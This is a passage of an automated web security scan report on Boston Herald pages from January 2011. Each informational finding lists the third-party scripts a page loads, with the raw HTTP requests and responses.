   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.629. http://www.bostonherald.com/entertainment/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.630. http://www.bostonherald.com/entertainment/movies/reviews/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.631. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.632. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.633. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.634. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.635. http://www.bostonherald.com/entertainment/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/music/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/music/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:12:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.636. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:11:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.637. http://www.bostonherald.com/entertainment/television/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/television/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://api.zap2it.com/tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=bostonher&zip=02118
http://blog.zap2it.com/ithappenedlastnight/zap2it-editorial-widget.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/television/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
